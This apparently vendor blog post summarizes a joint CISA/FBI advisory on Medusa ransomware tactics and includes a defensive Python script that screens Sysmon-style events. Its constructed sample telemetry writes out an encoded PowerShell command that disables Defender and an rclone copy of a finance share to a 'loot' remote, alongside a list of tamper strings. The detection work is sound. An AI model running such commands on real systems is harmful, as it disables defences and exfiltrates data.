Medusa Ransomware: Rising Threat to Critical Sectors

03/13/25

The Medusa ransomware gang has emerged as a significant threat, tallying over 300 victims across critical infrastructure sectors, including healthcare, manufacturing, and technology. This statistic comes from a joint #StopRansomware cybersecurity advisory (AA25-071A) released by CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) on Wednesday, March 12.

Since it was first identified in June 2021, Medusa has evolved from a closed ransomware operation into an affiliate model, allowing it to expand its reach. Despite this shift, crucial functions such as ransom negotiations remain centrally controlled by the original developers. The advisory notes that both the developers and their affiliates, referred to collectively as "Medusa actors," use a double extortion model: they encrypt victim data and threaten to publish exfiltrated information unless a ransom is paid.

According to the advisory, Medusa developers recruit initial access brokers on cybercriminal forums to gain a foothold in victims' environments. Once inside, Medusa actors rely on legitimate remote access and administration software to move laterally within networks, and they use network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner to enumerate users, hosts, and services.

The advisory notes that Medusa actors frequently use living-off-the-land (LotL) techniques to evade detection. These include obfuscated PowerShell (for example, base64-encoded commands, with PowerShell command history deleted afterwards) and the loading of vulnerable or signed drivers in a tactic known as "bring your own vulnerable driver" (BYOVD). Because such a driver runs in the kernel, it can terminate or blind endpoint detection and response (EDR) components that no ordinary user-mode process could touch, which significantly degrades the victim's defenses.

A recent blog post from Symantec's Threat Hunter team reported a 42% increase in Medusa attacks in 2024 compared with 2023, with continued growth observed in January and February 2025. The researchers pointed to extensive use of both legitimate drivers and custom-developed malicious tools, such as AVKill and POORTRY, to disable security software.

In an investigation of a January attack against a healthcare organization, the Threat Hunter team found that the Medusa actors used AVKill, POORTRY, and an undisclosed driver to incapacitate the organization's defenses. They also used RClone, an open-source file-synchronization tool, for data exfiltration and PsExec to run commands on remote hosts. Notably, the ransomware executable deleted itself after encrypting the targeted systems and files, complicating forensic analysis and sample recovery.
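The tradecraft described in the two passages above (encoded PowerShell and BYOVD on one side, RClone, PsExec and self-deleting binaries on the other) is the kind of thing a SOC can screen for in Sysmon telemetry. The script below is an added example written for this article, not code from the advisory, from Symantec, or from 2W Tech. The event lines are constructed, the driver blocklist entry is a placeholder (not a real hash), the scanner binary names are assumed defaults, and the "process deleting its own image" rule is a heuristic of ours rather than anything the advisory specifies.

```python
"""Triage a handful of Sysmon-style events for Medusa-like tradecraft.

Added example for this article; the events below are constructed and the
blocklist hash is a placeholder, not a real vulnerable-driver hash.
"""
import base64
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule detail")

# Placeholder: stand-in for the SHA256s your EDR or Microsoft's driver blocklist flags.
VULN_DRIVER_SHA256 = {
    "0000000000000000000000000000000000000000000000000000000000000001",
}
# Assumed default binary names; renamed copies need hash- or behaviour-based matching.
SCANNER_BINARIES = {"advanced_ip_scanner.exe", "netscan.exe"}
# Strings that commonly appear in defence-tampering scripts (heuristic list).
TAMPER_MARKERS = ("set-mppreference", "disablerealtimemonitoring", "sc stop", "taskkill")

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_event(line):
    """Parse a simplified 'Key=value Key="quoted value"' event line into a dict."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
            for m in FIELD_RE.finditer(line)}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower() if path else ""


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -e/-ec/-enc/-encodedcommand <base64>."""
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")  # PowerShell encodes as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        image = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if eid == "1":  # process creation
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                hits = [t for t in TAMPER_MARKERS if t in decoded.lower()]
                findings.append(Finding("encoded_powershell", f"decoded={decoded!r} tamper={hits}"))
            if image in SCANNER_BINARIES:
                findings.append(Finding("network_scanner", image))
            if image == "psexesvc.exe":  # PsExec's service-side component on the target host
                findings.append(Finding("psexec_service", ev.get("ParentImage", "")))
            if image == "rclone.exe" or re.search(r"(?i)\brclone\b", cmd):
                findings.append(Finding("rclone_exfil", cmd))
        elif eid == "6":  # driver load: blocklisted hash or unsigned image
            hashes = dict(p.split("=", 1) for p in ev.get("Hashes", "").split(",") if "=" in p)
            sha = hashes.get("SHA256", "").lower()
            if sha in VULN_DRIVER_SHA256 or ev.get("Signed", "").lower() != "true":
                findings.append(Finding("suspicious_driver_load", ev.get("ImageLoaded", "")))
        elif eid == "23":  # file delete: a process removing its own executable (heuristic)
            if ev.get("Image", "").lower() == ev.get("TargetFilename", "").lower():
                findings.append(Finding("self_delete", ev.get("Image", "")))
    return findings


# Constructed sample telemetry (not from a real incident).
ENCODED = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'CommandLine="powershell.exe -nop -w hidden -enc {ENCODED}"',
    'EventID=1 Image=C:\\Users\\Public\\advanced_ip_scanner.exe CommandLine="advanced_ip_scanner.exe /portable"',
    'EventID=6 ImageLoaded=C:\\Windows\\Temp\\drv.sys Signed=true Signature="Some Vendor" '
    'Hashes=SHA256=0000000000000000000000000000000000000000000000000000000000000001',
    'EventID=1 Image=C:\\Windows\\PSEXESVC.exe ParentImage=C:\\Windows\\System32\\services.exe '
    'CommandLine="C:\\Windows\\PSEXESVC.exe"',
    'EventID=1 Image=C:\\ProgramData\\rclone.exe '
    'CommandLine="rclone.exe copy C:\\Shares\\Finance remote:loot --config C:\\ProgramData\\r.conf"',
    'EventID=23 Image=C:\\Users\\Public\\payload.exe TargetFilename=C:\\Users\\Public\\payload.exe',
    'EventID=1 Image=C:\\Windows\\System32\\svchost.exe CommandLine="svchost.exe -k netsvcs"',  # benign
]


def run_sample():
    return analyze(parse_event(line) for line in SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.rule}] {f.detail}")
```

The encoded-command rule decodes the payload rather than merely flagging the -enc switch, so analysts see the Set-MpPreference call instead of a base64 blob; the driver rule should be fed from a maintained blocklist rather than the placeholder set, and the rclone rule will miss a renamed binary, which is exactly why pairing it with file-hash or network-egress telemetry matters.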

Considering the rising threat posed by the Medusa ransomware gang, CISA, the FBI, and MS-ISAC recommend several protective measures, including:

  • Disabling command-line and scripting activities and permissions where they are not needed, to limit LotL techniques.
  • Implementing access controls based on the principle of least privilege, to limit what a compromised account can reach and reduce privilege escalation opportunities.

The advisory emphasizes that privilege escalation and lateral movement often depend on utilities run from the command line; if threat actors cannot run those tools, they will have difficulty escalating privileges or moving laterally within the network.

As the threat landscape continues to evolve, organizations must remain vigilant and proactive in their cybersecurity measures to combat the increasing prevalence of ransomware attacks like those perpetrated by the Medusa gang.

At 2W Tech, we specialize in helping organizations protect themselves against ransomware threats like Medusa. Through our managed IT services and advanced cybersecurity solutions, we work to ensure your systems are fortified against potential vulnerabilities. Our comprehensive approach includes implementing robust endpoint protection to guard against BYOVD attacks, conducting regular vulnerability assessments to identify and resolve weak points, and deploying advanced monitoring and detection tools to identify malicious activity before it escalates. Additionally, we assist organizations in developing incident response plans designed to minimize downtime and ensure a swift recovery from potential attacks. Partnering with 2W Tech means gaining a dedicated ally in the fight against evolving cybersecurity threats.
